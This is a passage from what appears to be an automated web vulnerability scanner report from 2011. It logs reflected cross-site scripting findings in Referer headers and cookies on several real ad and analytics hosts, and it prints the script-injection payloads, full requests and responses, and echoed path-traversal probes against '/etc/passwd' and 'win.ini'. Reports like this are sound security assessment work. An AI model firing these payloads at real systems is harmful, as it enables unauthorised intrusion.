Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62; 1821vvc=3; 1821_idz=XnclJ01Pg6id2FcJU13kUkMfaXVNV%2F8gxkjQn8hBPcG6LNaooz40h%2BMaW0hQlsjGSRD%2BkhBEQXtHEo8uNUWZDoUCReT5yO90BLxF%2FLlYyUr51FG%2FyyfLpChY7rUtOwVCw8l%2Fg3u5V7ZarDSzVOiKi6RLcJ2O; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A1000%2C%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Fri, 16 Sep 2011 21:55:23 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
P3P: policyref="http://livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"
Set-Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62e972f%3Cscript%3Ealert%281%29%3C%2Fscript%3E5056afb88a3; expires=Sun, 15-Sep-2013 21:55:23 GMT; path=/
Set-Cookie: 1821_idzp=%7B%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%2C%22site_id%22%3A1821%2C%22lang%22%3A%22en%22%2C%22pageview%22%3A15%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.google.com%5C%2Fsearch%3Fhl%3Den%26q%3Dfdc67%3Ca%3Ea5c9c6f1d3f%22%2C%22timeElapsed%22%3A21936835.38%2C%22navTime%22%3A1316210123000%7D; path=/
Expires: Mon, 22 Jan 1978 12:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 42166

if(typeof(iAdvize) !== 'object'){
   
if (/Safari/.test(navigator.userAgent) && !(/Chrome/.test(navigator.userAgent))) {
   var Sbody = document.getElementsByTagName( 'BODY' )[ 0 ];
   var newNode = docume
...[SNIP]...
ue;return this;}}
iAdvize.vProf={"origin_site":"","origin":"direct","refengine":"","refkeyword":"","site_id":1821,"lang":"en","pageview":15,"referrer_lastPage":"http:\/\/www.google.com\/search?hl=en&q=fdc67<a>a5c9c6f1d3f","timeElapsed":21936835.38,"navTime":1316210123000};for(var v in iAdvize.vProf){iAdvize.vStats[v]=iAdvize.vProf[v];}
if(iAdvize.customize.layout!='fb'){iAdvize.vStats['actualURI']=document.location.hr
...[SNIP]...

4.243. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6fda"-alert(1)-"59dcd0f77c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=454&campId=179530 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=c6fda"-alert(1)-"59dcd0f77c6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CFFD569029874B9F09FDBC8BDC1C281D; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:39 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=c6fda"-alert(1)-"59dcd0f77c6",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=454&campId=179530",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000"
...[SNIP]...

4.244. http://www.westhost.com/images/bluegradbg.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.westhost.com
Path:   /images/bluegradbg.gif

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15587"><script>alert(1)</script>4c1acf1096 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /images/bluegradbg.gif HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=15587"><script>alert(1)</script>4c1acf1096
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:43:17 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15716
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" itemscope itemtype
...[SNIP]...
<input type="hidden" name="referer" value="http://www.google.com/search?hl=en&q=15587"><script>alert(1)</script>4c1acf1096" />
...[SNIP]...

4.245. http://www.westhost.com/images/boxtopbackground.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.westhost.com
Path:   /images/boxtopbackground.gif

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a84af"><script>alert(1)</script>5804086750f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /images/boxtopbackground.gif HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a84af"><script>alert(1)</script>5804086750f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:43:16 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15723
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" itemscope itemtype
...[SNIP]...
<input type="hidden" name="referer" value="http://www.google.com/search?hl=en&q=a84af"><script>alert(1)</script>5804086750f" />
...[SNIP]...

4.246. http://3ps.go.com/DynamicAd [tqq cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://3ps.go.com
Path:   /DynamicAd

Issue detail

The value of the tqq cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fdb0"><script>alert(1)</script>7d0b5212154 was submitted in the tqq cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /DynamicAd?srvc=abc&adTypes=Rectangles-Remnant&url=/shows/charlies-angels/bios/eve-french HTTP/1.1
Host: 3ps.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$3fdb0"><script>alert(1)</script>7d0b5212154; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:10:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: SRV08
Content-Length: 572
Cache-control: no-cache
Pragma: no-cache

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "4";
CasaleArgs.casaleID = 93093;
</script>
<script type="text/javascript" src="http:/
...[SNIP]...
<script language="javascript" type="text/javascript" src="http://log.go.com/log?ft=j&amp;srvc=abc&amp;addata=2214:65390:815034:65390&amp;tqq=$D$3fdb0"><script>alert(1)</script>7d0b5212154&amp;method=GET&amp;cap=1:815034:3:24&amp;svr=3ps.go.com&amp;host=3ps.go.com&amp;guid=CC5CABF7-F3B3-4377-BEB5-5632C455B409&amp;sf=">
...[SNIP]...

4.247. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload dd5c7<script>alert(1)</script>46d870f04bf was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p63514475&PRAd=348445181&AR_C=233006068 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282dd5c7<script>alert(1)</script>46d870f04bf

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:54:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p63514475=exp=119&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:54:59 2011&250d16de58214c9a371d551e=1&prad=348445181&arc=233006068&; expires=Fri 16-Dec-2011 00:54:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 33027

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"348445181",Pid:"p63514475",Arc:"233006068",Location:
...[SNIP]...
Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&', "BMX_G250d16dea83662e86ace2653": 'method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C', "UID": '9cc29993-80.67.74.150-1314836282dd5c7<script>alert(1)</script>46d870f04bf', "ar_35525<script>
...[SNIP]...

4.248. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p110620504 cookie is copied into the HTML document as plain text between tags. The payload 9d109<script>alert(1)</script>e82c318cd9 was submitted in the ar_p110620504 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p63514475&PRAd=348445181&AR_C=233006068 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&9d109<script>alert(1)</script>e82c318cd9; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:54:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p63514475=exp=109&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:54:56 2011&250d16de58214c9a371d551e=1&prad=348445181&arc=233006068&; expires=Fri 16-Dec-2011 00:54:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 33095

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"348445181",Pid:"p63514475",Arc:"233006068",Location:
...[SNIP]...
', "BMX_G'": 'method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&9d109<script>alert(1)</script>e82c318cd9', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C', "../../../../../../../../../winnt/win.ini": 'exp=1&initExp=Sat Sep 17 00:54:40 2011&recExp=Sat Sep 17 00:54:40 2011&pra
...[SNIP]...

4.249. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 94897<script>alert(1)</script>2f567b2e38c was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p63514475&PRAd=348445181&AR_C=233006068 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&94897<script>alert(1)</script>2f567b2e38c; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:54:54 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p63514475=exp=99&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:54:54 2011&250d16de58214c9a371d551e=1&prad=348445181&arc=233006068&; expires=Fri 16-Dec-2011 00:54:54 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 33095

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"348445181",Pid:"p63514475",Arc:"233006068",Location:
...[SNIP]...
'2-- =method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C', "ar_p81479006": 'exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&94897<script>alert(1)</script>2f567b2e38c', "88df3a7495": 'exp=1&initExp=Sat Sep 17 00:54:36 2011&recExp=Sat Sep 17 00:54:36 2011&prad=348445181&arc=233006068&', "../../../../../../../etc/passwd": 'exp=1&initExp=Sat Sep 17 00:54:41 2011&rec
...[SNIP]...

4.250. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 46fd3<script>alert(1)</script>1949a7554aa was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p63514475&PRAd=348445181&AR_C=233006068 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&46fd3<script>alert(1)</script>1949a7554aa; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:54:52 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p63514475=exp=89&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:54:52 2011&250d16de58214c9a371d551e=1&prad=348445181&arc=233006068&; expires=Fri 16-Dec-2011 00:54:52 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 33098

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"348445181",Pid:"p63514475",Arc:"233006068",Location:
...[SNIP]...
indows/win.ini": 'method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C', "ar_p82806590": 'exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&46fd3<script>alert(1)</script>1949a7554aa', "BMX_G'": 'method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&
...[SNIP]...

4.251. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 6557f<script>alert(1)</script>91f47577525 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p63514475&PRAd=348445181&AR_C=233006068 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&6557f<script>alert(1)</script>91f47577525; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:54:50 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p63514475=exp=79&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:54:50 2011&250d16de58214c9a371d551e=1&prad=348445181&arc=233006068&; expires=Fri 16-Dec-2011 00:54:50 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 33095

